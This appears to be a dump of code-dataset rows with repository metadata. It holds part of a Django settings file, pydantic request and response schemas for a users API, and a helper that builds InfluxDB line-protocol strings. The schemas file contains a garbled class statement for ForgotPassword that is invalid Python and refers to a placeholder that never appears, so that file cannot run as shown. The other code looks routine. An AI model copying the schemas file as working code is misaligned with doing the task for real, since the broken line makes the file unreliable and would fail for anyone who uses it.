# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# SQLite file alongside the project — fine for development only.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"prosenjitearnkuar@gmail.com"
] | prosenjitearnkuar@gmail.com |
a8520e9f05d38ae8d69d2db4c4af9f856b832dd5 | 37132d47fd22e98ffdb5f6673ebacb41ee12f762 | /src/users/models.py | cb642d67f5734c9a87f3aecb5f67f2f823023dee | [
"Apache-2.0"
] | permissive | git-vish/CodeSpaceAPI | b0037dc46e28d108a23519492269f13adf0c9e4e | 7ad4327e0eef3019098730358c4a23312bc85615 | refs/heads/main | 2023-06-23T16:49:53.749045 | 2021-07-25T19:13:32 | 2021-07-25T19:13:32 | 382,095,296 | 1 | 0 | Apache-2.0 | 2021-07-01T16:32:20 | 2021-07-01T16:32:20 | null | UTF-8 | Python | false | false | 1,553 | py | """Pydantic schemas for Users API.
"""
# Author Info
__author__ = 'Vishwajeet Ghatage'
__date__ = '11/07/21'
__email__ = 'cloudmail.vishwajeet@gmail.com'
# Library Imports
from typing import List, Optional
from pydantic import BaseModel, EmailStr
class UserBase(BaseModel):
    """Base user model shared by the request/response schemas below."""
    # Validated e-mail address (pydantic EmailStr).
    email: EmailStr
class UserCreate(UserBase):
    """Request body for creating a user.

    Note:
    ---------
    Password encryption must be performed at front end.
    """
    first_name: str
    last_name: str
    # Expected to arrive already encrypted (see Note above).
    password: str
class UserLogin(UserBase):
    """Request body for logging a user in (email inherited from UserBase).

    Note:
    ---------
    Password encryption must be performed at front end.
    """
    # Expected to arrive already encrypted (see Note above).
    password: str
class Token(BaseModel):
    """JWT access token returned to an authenticated client."""
    access_token: str
    # Token scheme identifier (presumably "bearer" — confirm with auth layer).
    token_type: str
class ChangePassword(BaseModel):
    """Request body carrying the replacement password."""
    new_password: str
class ForgotPassword(BaseModel) if False else ForgotPassword  # placeholder — see below
class ResetPassword(ChangePassword):
    """Password reset request: new password plus the emailed verification code."""
    verification_code: str
class ProfileGet(BaseModel):
    """Response body describing a user's public profile."""
    name: str
    email: EmailStr
    bio: str
    batch: str
    # Profile links — presumably full URLs; confirm against the serializer.
    linkedin: str
    github: str
    skills: List[str]
    profile_pic: str
class ProfileUpdate(BaseModel):
    """Partial-update request: every field is optional so clients send only changes."""
    first_name: Optional[str]
    last_name: Optional[str]
    email: Optional[EmailStr]
    bio: Optional[str]
    batch: Optional[str]
    linkedin: Optional[str]
    github: Optional[str]
    # NOTE(review): ['skill'] looks like a placeholder default — confirm it is
    # intended rather than None/[] before relying on it.
    skills: Optional[List[str]] = ['skill']
| [
"cloudmail.vishwajeet@gmail.com"
] | cloudmail.vishwajeet@gmail.com |
8652f163ca8f8ea1ea0d3cc5fceb48a51d48d380 | 4f2e01b2c9934aa3906482056a2eb89b0b09cd7f | parse_data.py | c56b7db971f4b9de577faead453bcc7518208b5c | [] | no_license | dhruvinsh/influxdb | 4c109bf51813a698d17d2a44cc0a815028e70c42 | 81335314b2e6698a5a0ab1b345de011050044de5 | refs/heads/master | 2020-05-23T20:50:44.006036 | 2019-05-18T17:19:37 | 2019-05-18T17:19:37 | 184,688,270 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | def _dict_to_line(dikt: dict) -> str:
    # Render {'a': 1, 'b': 2} as "a=1,b=2" — comma-joined key=value pairs
    # (InfluxDB line-protocol tag_set / field_set fragment).
    return ','.join(['{}={}'.format(k, v) for k, v in dikt.items()])
def make_line(data: dict) -> str:
    """Build an InfluxDB line-protocol string from a point dict.

    data = {
        'measurement': 'cpu',
        'tags': {'hostname': 'localhost', 'region': 'ca'},
        'fields': {'value': 0.51}
    }
    ==> cpu,hostname=localhost,region=ca value=0.51

    Raises AssertionError when 'measurement' or 'fields' is missing or
    empty: line protocol requires a measurement and at least one field.
    Tags are optional.
    """

    def _pairs(d: dict) -> str:
        # "a=1,b=2" — comma-joined key=value pairs.
        return ','.join('{}={}'.format(k, v) for k, v in d.items())

    measurement = data.get("measurement")
    tags = data.get("tags")
    fields = data.get("fields")
    # Truthy checks (not just `is not None`): the original accepted an empty
    # fields dict and silently emitted a measurement-only, invalid line.
    assert measurement, "Should need to have measurement"
    assert fields, "Should need to have fields"

    query = measurement
    if tags:
        query += ',' + _pairs(tags)
    query += ' ' + _pairs(fields)
    return query
| [
"dhruvin3@gmail.com"
] | dhruvin3@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.